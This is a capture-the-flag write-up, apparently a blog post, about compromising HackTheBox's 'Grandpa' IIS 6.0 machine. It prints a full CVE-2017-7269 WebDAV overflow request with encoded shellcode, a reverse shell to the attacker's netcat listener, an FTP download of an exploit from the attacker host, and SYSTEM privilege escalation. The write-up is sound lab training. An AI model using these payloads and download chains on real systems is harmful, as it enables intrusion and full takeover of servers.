Pwning Grandpa in HackTheBox without Metasploit.

Varun
5 min readJan 22, 2021

--

History

The previous box Granny was also running an IIS 6.0 Server, this box is another take on the Microsoft IIS. Armed with the knowledge gained by solving the previous box, let’s see how we can pwn Grandpa!

Recon

The IP of the box is 10.10.10.14, let’s check for open ports.

┌──(kali㉿kali)-[~/HackTheBox/Grandpa/recon]
└─$ nmap -sC -sV -p0-1000 10.10.10.14 > resutlts.txt &
┌──(kali㉿kali)-[~/HackTheBox/Grandpa/recon]
└─$ cat results.txt 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-22 09:35 EST
Nmap scan report for 10.10.10.14
Host is up (0.20s latency).
Not shown: 1000 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
| Server Date: Fri, 22 Jan 2021 14:36:42 GMT
| WebDAV type: Unknown
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.77 seconds

We can see a Windows system running , MS IIS 6.0 on port 80. It’s also clear that server allows multiple methods to the users, which is similar to the Granny Box.

Let’s see what all file types the server accepts.

┌──(kali㉿kali)-[~/HackTheBox/Grandpa/recon]
└─$ davtest -url http://10.10.10.14 > test.txt &
┌──(kali㉿kali)-[~/HackTheBox/Grandpa/recon]
└─$ cat test.txt 130 ⨯
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.14
********************************************************
NOTE Random string for this session: Xvl4P6jmA
********************************************************
Creating directory
********************************************************
Sending test files
PUT shtml FAIL
PUT asp FAIL
PUT cgi FAIL
PUT pl FAIL
PUT php FAIL
PUT jsp FAIL
PUT cfm FAIL
PUT html FAIL
PUT txt FAIL
PUT aspx FAIL
PUT jhtml FAIL
********************************************************
/usr/bin/davtest Summary:

Now that is a problem, it seems like the IIS server doesn’t allow any file types to be put into the file system. So pushing a reverse shell into the server is not going to work.

Foothold

Let’s do a search on known exploits of IIS 6.0

┌──(kali㉿kali)-[~/HackTheBox/Grandpa/recon]
└─$ searchsploit IIS 6.0
------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------- ---------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network N | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Ove | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Serv | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Ov | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP) | windows/remote/8765.php
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/HackTheBox/Grandpa/recon]
└─$

We can find a few exploits using the WebDAV, doing a search on the Microsoft IIS 6.0 — WebDAV ‘ScStoragePathFromUrl’ Remote Buffer Overflow

This vulnerability is due to ‘Improper validation of a long header in a HTTP request.’ CVE-2017–7269

Found an implementation of the exploit that can be used to get a foothold. Renaming the file to shell.py and setting up a listener at port 54.

┌──(kali㉿kali)-[~/HackTheBox/Grandpa/exploit/iis6-exploit-2017-CVE-2017-7269]
└─$ python shell.py 10.10.10.14 80 10.10.14.23 54
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
If: <http://localhost/aaaaaaa₩ᄑᄄ￧ᄀᆪ￧ンᄀ￧トᄈ₩ᄂᄊ¦ンᄇ￧ᄄᄍ¦ᆳᄋ¦ᄑᄚ￧ユモ￧ᄅマ¦ᄀᄄ¥ルᆪ₩ᄉヤ₩ᄀナ ̄ᆬモ¥チᆲ¥ユᄃ₩ンᆪ ̄ヘᄂ¦リᄚ￧ᄀナ₩ᆬメ¥ミᄆ¦ᄆリ₩ᄅム￧ノチ¦ネᄆ￧タᄉ¥ᄀミ ̄ルᄂ₩ᄆヌ ̄ヤᄍ¥ムᆰ¥タᄡ¥ムテ￧ンメ¥チᄀ ̄ネᄇ₩ᄉヒ₩ᄚᄡ ̄ノヌ₩ノチ ̄ンヘ¥ナᄀ¥ᄀᄁ¦ンᄈ¥ノミ ̄ルᄚ￧ユト₩ᄀᆰ ̄ヘᄡ¦ᄍハ￧ᄀᆱ¦ᆬᄊ¦ᄍᄈ¦ᄆᆰ¥ンᄎ₩ᄑᄆ¥ᄀハ ̄ネᄚ ̄ンᆴ¦ᆳノ¥ノヘ¦ᄀᆪ₩ᄑフ￧ユヨ￧ユᄉ₩ルᆵ￧ルᄄ¦ムヘ¥チᄚ￧ᄄᄊ₩ノヒ₩ユラ￧ユミ₩ᄅᄇ￧ᄅᆱ￧ンᄁ￧ルリ₩ノネ₩ヤᄆ ̄チヤ₩ᄆᄍ¥チハ¥ムᄁ¥タᄈ ̄ユᄋ₩ᄅᄋ¦ナト ̄フᄡ₩ムᄊ¦ᄉニ¥ルヤ¦ンᆲ₩ユテ￧リᄇ￧ノᄌ¥ンᄅ¦フᄌ₩ノᄇ¥ᄄᄚ¥ᄂᄌ¥ムネ￈ツ￈ツ£ヒタ₩ᅠテ₩ᄆト¥ノヨ¦ᆲᄋ₩ᄆᆳ¦ᄑリ¥ᄀレ￧ᆬミ¦ᆬᆰ¥ᄀマ¦ᄅメ¦ナミ₩ルヘ£マタ₩ᅠテ¦ᅠᄡ₩ヤᄆ₩ᄑテ₩ᄍᆭ￧ムチ¦ヘᆲ£マタ₩ᅠテ¥ヘテ₩ᄅチ￧チメ ̄フᄚ¥ᄀᆭ¦ノフ￧チヒ₩ヘニ¥ナᄈ￧ᆬチ￧ᄅミ¦ᄅᆲ> (Not <locktoken:write1>) <http://localhost/bbbbbbb￧ᆬネ₩ナᄉ¦ᄑテ₩ᄑᄃ₩ᆳᆵ¦ᄀナ ̄ルニ₩ンᄉ¦ミᄈ ̄ᄀᄆ¥ンᆬ¥ᄅᄁ¥ミᄉ¥ルᄀ₩ᆬメ₩ᄅモ¥ナラ ̄ᄀホ¥ᆬネ₩ヘユ¦ᆬᄆ¦ヘᄂ₩ムᄇ ̄ムᄄ¦ンリ￧ナᄍ ̄ヘᆱ₩ᆳユ₩ᄉネ¥チマ￧ᄅニ ̄ムᄆ₩ᄑヤ￧ムテ¥ᆬヨ₩ᄑᆵ￧ヘチ ̄ムラ₩ナᄄ￧ᄅᄇ ̄ンナ¦ᄉノ¥ンホ¥ムネ¦ᄚᄌ ̄ルᄎ ̄ユᄇ₩ノᆭ₩ᄍテ¦ᄀᆳ ̄ユネ₩ナᄋ¦ᄉレ₩ナᄡ¦トᄈ¦ヘᆬ¥ノᄇ₩ᄉᄅ ̄ルᄆ¦ᄍᄂ₩ᄌᄍ₩ヘモ₩ᆳᄂ¥ナニ¦ᄐᄚ￧ᄀᆵ￧ノモ₩ンミ¦ユモ￧ᄅᆪ￧トᄍ¦ᄑモ¦ムヨ₩ᄐᄊ￧ヘᄍ₩ᄀᄋ￧ᄅヨ₩ナハ ̄ᆬナ ̄リᄍ₩ᄚᄍ¦ヤᄆ ̄ムᄇ¥ヘᆬ¥ᄀハ¦ムホ￧ᄅト₩ᄚᄉ¥ᄅヨ₩ノチ₩ᄍᄇ₩リᄆ¥ᆬル¥ミᄈ ̄ナツ¥ᄀᆬ¥ᆬチ￧ナミ ̄タᄊ¥ンᄋ¦ムラ¥ヘᄀ£マタ₩ᅠテ₩ᄍマ₩ᅠタ₩ᄍマ₩ᅠタ¦ノヌ￧ルᆰ£マタ₩ᅠテ¦ノラ¦ᄑᄡ¥ᆬヌ¥ネᄡ¦ᆳᆭ¦ᆳツ￧ムᄂ￧ᄀᆵ₩ツツ₩ᅠチ¥トᄉ￧ノᄎ￧ムᄎ¦ᄉヌ¦ムル¥ンラ→トモ₩ᅠタ ̄ナᄊ₩ᄍᆵ¬モᆪ₩ᅠチ£ムᅠ₩ᅠテ￧﾿ᄒ￯﾿﾿￯﾿﾿£マタ₩ᅠテ￑ᆴ₩ᅠテ￧ナᆴ￧ムᄚ£ミᄡ₩ᅠテ¬ᄃᄃ₩ᅠチ←ホム₩ᅠタ ̄ᄂᄆ₩ルᆴ¦ᆬユ ̄チメ¥ムᆱ￧ルᆱ￧ノハ￧ᆬᄀ£ミワ₩ᅠテ₩ᄌナ₩ᅠタ￧ワᄇ￧ᆬᄄ¦ᄉᄅ ̄ルᆲ¦ムᄄ¦ᄉᄚ│ノニ₩ᅠタ¦ᄀᄋ ̄ノモ£ᄊᆰ₩ᅠツ₩ᄑᆰ¦フᄉ£マᄌ₩ᅠテ¬ᄃᄃ₩ᅠチVVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJINDKSKPKPTKKQTKT0D8TKQ8RTJKKX1OTKIGJSW4R0KOIBJHKCKOKOKOF0V04PF0M0A>

Got the shell

┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 54 1 ⨯
listening on [any] 54 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.14] 1029
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
c:\windows\system32\inetsrv>net user
net user
User accounts for \\GRANPA-------------------------------------------------------------------------------
Administrator ASPNET Guest
Harry IUSR_GRANPA IWAM_GRANPA
SUPPORT_388945a0
The command completed successfully.
c:\windows\system32\inetsrv>net user ASPNET
net user ASPNET
User name ASPNET
Full Name ASP.NET Machine Account
Comment Account used for running the ASP.NET worker process (aspnet_wp.exe)
User's comment Account used for running the ASP.NET worker process (aspnet_wp.exe)
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/12/2017 4:17 PM
Password expires Never
Password changeable 4/12/2017 4:17 PM
Password required No
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed AllLocal Group Memberships *Users
Global Group memberships *None
The command completed successfully.
c:\windows\system32\inetsrv>

And it’s clear that the user doesn’t have Admin access.

Privilege Escalation

Since I already have an idea about the IIS server, just want to check if the MS09–20 also works for this machine. The only thing that I need to do is tweek the delivery mechanism.

Moving into the Inetpub directory, where we can write files and configuring a neat ftp download of the MS09–20 exploit from the attacker’s system.

C:\>cd Inetpub\
cd Inetpub\
C:\Inetpub>echo open 10.10.14.23 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET exploit.exe >> ftp.txt&echo bye>> ftp.txt
echo open 10.10.14.23 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET exploit.exe >> ftp.txt&echo bye>> ftp.txt

Now let me run a ftp server in the exploit directory

┌──(kali㉿kali)-[~/HackTheBox/Grandpa/exploit]
└─$ sudo python3 -m pyftpdlib -p 21
[sudo] password for kali:
[I 2021-01-22 14:48:50] concurrency model: async
[I 2021-01-22 14:48:50] masquerade (NAT) address: None
[I 2021-01-22 14:48:50] passive ports: None
[I 2021-01-22 14:48:50] >>> starting FTP server on 0.0.0.0:21, pid=6912 <<<

Copying the exploit file.

C:\Inetpub>ftp -v -n -s:ftp.txt
ftp -v -n -s:ftp.txt
Connected to 10.10.14.23.
open 10.10.14.23 21
220 pyftpdlib 1.5.6 ready.
USER anonymous
331 Username ok, send password.
230 Login successful.
bin
200 Type set to: Binary.
GET exploit.exe
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp: 211716 bytes received in 0.83Seconds 255.70Kbytes/sec.
bye
C:\Inetpub>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Inetpub01/22/2021 09:50 PM <DIR> .
01/22/2021 09:50 PM <DIR> ..
04/12/2017 04:16 PM <DIR> AdminScripts
01/22/2021 09:50 PM 211,716 exploit.exe
01/22/2021 09:47 PM 77 ftp.txt
04/12/2017 04:17 PM <DIR> wwwroot
2 File(s) 211,793 bytes
4 Dir(s) 18,091,433,984 bytes free

And we got the exploit!!

  • -v : Verbose, shows all responses from remote server.
  • -n : Doesn’t allow auto-login.
  • -s : To use a script.

Root Access

Now to check if it works!

C:\Inetpub>exploit.exe whoami
exploit.exe whoami
nt authority\system
-------------------------------------------
kindle-->Got WMI process Pid: 1856
begin to try
kindle-->Found token SYSTEM
kindle-->Command:whoami
C:\Inetpub>exploit.exe cmd.exe
exploit.exe cmd.exe
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Inetpub>whoami
whoami
-------------------------------------------
kindle-->Got WMI process Pid: 1856
begin to try
kindle-->Found token SYSTEM
kindle-->Command:cmd.exe
nt authority\system

And Boom! 💣

We got System access.😎

Flags

C:\Documents and Settings\Harry\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Harry\Desktop04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:32 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 18,091,405,312 bytes free
C:\Documents and Settings>cd Administrator/Desktop
cd Administrator/Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Administrator\Desktop04/12/2017 04:28 PM <DIR> .
04/12/2017 04:28 PM <DIR> ..
04/12/2017 04:29 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 18,091,401,216 bytes free
C:\Documents and Settings\Administrator\Desktop>

Another one down!! 🔥🔥

--

--

Varun
Varun

Written by Varun

Grad Student. Member Bi0s.

No responses yet